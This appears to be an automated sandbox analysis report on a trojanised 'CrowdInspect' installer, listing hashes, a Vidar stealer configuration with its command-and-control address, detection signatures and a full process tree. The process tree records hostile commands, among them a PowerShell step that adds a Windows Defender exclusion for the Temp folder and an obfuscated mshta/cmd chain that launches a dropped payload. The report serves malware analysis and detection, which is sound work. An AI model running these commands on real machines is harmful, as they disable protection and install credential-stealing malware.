Analysis
-
max time kernel
2352s -
max time network
2355s -
platform
windows11_x64 -
resource
win11 -
submitted
18-10-2021 13:27
General
-
Target
CrowdInspect.sfx.exe
-
Size
5.4MB
-
MD5
2c5e13c2c114e68a22533d181e78c4e7
-
SHA1
92b8ed2a8880f077bf1bbbf835b759fa5f333c46
-
SHA256
a4c21069788dbf57de477c9b2c5a2027b3d87203eae9852b7d54033687e6b738
-
SHA512
092cfe4da514c800d92f94a8f83c19f1807ceaf1981af081b94a3d6c46dcaaa69bbecee0ac198fdbb9fc33b0a295fbedb02c3d2aa461b580bc2be5f8f33a7955
Score
10/10
Malware Config
Extracted
Family
vidar
Version
41.4
Botnet
932
C2
https://mas.to/@sslam
Attributes
-
profile_id
932
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
-
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
-
Socelars Payload 2 IoCs
-
Suspicious use of NtCreateProcessExOtherParentProcess 26 IoCs
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
evasion 1 IoCs
evasion.
-
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
-
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
-
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
-
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
suricata: ET MALWARE Win32/Vidar Variant Stealer CnC Exfil
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 4 IoCs
-
ASPack v2.12-2.42 6 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Blocklisted process makes network request 19 IoCs
-
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
-
Executes dropped EXE 64 IoCs
-
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 36 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 64 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses 2FA software files, possible credential harvesting 2 TTPs
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 17 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 16 IoCs
-
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 12 IoCs
-
Suspicious use of SetThreadContext 7 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Drops file in Windows directory 31 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 26 IoCs
-
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 2 IoCs
-
Download via BitsAdmin 1 TTPs 2 IoCs
-
Enumerates system info in registry 2 TTPs 56 IoCs
-
Kills process with taskkill 6 IoCs
-
Modifies data under HKEY_USERS 51 IoCs
-
Modifies registry class 5 IoCs
-
Modifies system certificate store 2 TTPs 6 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 20 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 9 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe"C:\Users\Admin\AppData\Local\Temp\CrowdInspect.sfx.exe"1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\Upfc.exeC:\Windows\System32\Upfc.exe /launchtype periodic /cv I50SDwAzrk2EvCFYy6B5rQ.01⤵
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pVzHgpXms02TJxnTGiup5w.0.21⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -s W32Time1⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Desktop\CrowdInspect64.exe"C:\Users\Admin\Desktop\CrowdInspect64.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.crowdstrike.com/inspect/replaceav3⤵
- Adds Run key to start application
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f47184⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:24⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2320 /prefetch:34⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2740 /prefetch:84⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:14⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2136,12454311616753323726,18382762923751060100,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:14⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\CrowdInspect.exe"C:\Users\Admin\Desktop\CrowdInspect.exe"1⤵
- Executes dropped EXE
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Desktop\setup_x86_x64_install.exe"C:\Users\Admin\Desktop\setup_x86_x64_install.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11b7ab2df056a.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exeMon11b7ab2df056a.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11b7ab2df056a.exe6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon114917d808c86e0ba.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exeMon114917d808c86e0ba.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp"C:\Users\Admin\AppData\Local\Temp\is-7RH96.tmp\Mon114917d808c86e0ba.tmp" /SL5="$700C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe"C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT7⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp"C:\Users\Admin\AppData\Local\Temp\is-A9KQG.tmp\Mon114917d808c86e0ba.tmp" /SL5="$601FE,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon114917d808c86e0ba.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-S51V3.tmp\postback.exe" ss19⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon112c3d79b6fdf8.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon112c3d79b6fdf8.exeMon112c3d79b6fdf8.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 852 -s 2846⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11bc113a5813.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exeMon11bc113a5813.exe5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11bc113a5813.exe6⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 584 -s 287⤵
- Drops file in Windows directory
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11991188390d59.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11991188390d59.exeMon11991188390d59.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 2846⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1190ed9443.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1190ed9443.exeMon1190ed9443.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1248 -s 19126⤵
- Program crash
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon11f55cde4ec30.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exeMon11f55cde4ec30.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exeC:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon11f55cde4ec30.exe6⤵
-
C:\Users\Admin\AppData\Local\Temp\mminer.exe"C:\Users\Admin\AppData\Local\Temp\mminer.exe"7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon1173d8f84c056.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon1173d8f84c056.exeMon1173d8f84c056.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon110c83ac9fca39.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS032D83E5\Mon110c83ac9fca39.exeMon110c83ac9fca39.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"C:\Users\Admin\Pictures\Adobe Films\jBnRXiidSZk9hgIAefJUErEC.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"C:\Users\Admin\Pictures\Adobe Films\p9IkKDDHEvPP_0EBsFu2v6aq.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"C:\Users\Admin\Pictures\Adobe Films\Ij6YtsqVdlgwgUz3rMkCp0mj.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe"C:\Users\Admin\Documents\HJvxq8lTLdmwcqK6tzGee8KT.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe"C:\Users\Admin\Pictures\Adobe Films\fLt5aaWDMdJHJUJsdaAbuivD.exe"8⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe"C:\Users\Admin\Pictures\Adobe Films\GBI_yH9a9U9c0kT8e_JoFRwy.exe" /mixtwo8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5204 -s 2889⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe"C:\Users\Admin\Pictures\Adobe Films\G11bso2kaqD8zyt7zjqFKTew.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe"C:\Users\Admin\Pictures\Adobe Films\W2JFSO1Ax2gZg76M0IGV9hjG.exe"8⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5500 -s 2769⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
-
C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe"C:\Users\Admin\Pictures\Adobe Films\93ZmYt7z4b0Vv4V67aT8bYvi.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"8⤵
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\xjoDIB1cgkY5rhQ62iKlOsJ7.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "xjoDIB1cgkY5rhQ62iKlOsJ7.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe"C:\Users\Admin\Pictures\Adobe Films\s9ldn7_ecQr1OKXD8s8Chci6.exe"8⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\setup.exeC:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=19⤵
- Loads dropped DLL
- Adds Run key to start application
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--EpsUK1"10⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffc9cb2dec0,0x7ffc9cb2ded0,0x7ffc9cb2dee011⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exeC:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x158,0x15c,0x160,0x134,0x164,0x7ff7b6979e70,0x7ff7b6979e80,0x7ff7b6979e9012⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,14913646324800417076,7703059395117259456,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2916_1239287217" --mojo-platform-channel-handle=1740 /prefetch:811⤵
-
C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"8⤵
-
C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp"C:\Users\Admin\AppData\Local\Temp\is-PIJ8C.tmp\mrHwPgjMlMAKo1RO_q8Zcfe4.tmp" /SL5="$40484,506127,422400,C:\Users\Admin\Pictures\Adobe Films\mrHwPgjMlMAKo1RO_q8Zcfe4.exe"9⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe"C:\Users\Admin\AppData\Local\Temp\is-H0QUK.tmp\ShareFolder.exe" /S /UID=270910⤵
- Drops file in Drivers directory
- Adds Run key to start application
-
C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe"C:\Users\Admin\AppData\Local\Temp\QCMBWQQTIC\foldershare.exe" /VERYSILENT11⤵
-
C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe"C:\Users\Admin\AppData\Local\Temp\2d-ef9d3-a9b-e74b2-964391f3d899f\Punolebale.exe"11⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e612⤵
- Adds Run key to start application
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x11c,0x120,0x124,0xfc,0x128,0x7ffcac2f46f8,0x7ffcac2f4708,0x7ffcac2f471813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 /prefetch:213⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2160 /prefetch:313⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2804 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3560 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3568 /prefetch:113⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5056 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=5252 /prefetch:813⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,1630525392455116337,3523879099738542002,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4144 /prefetch:113⤵
-
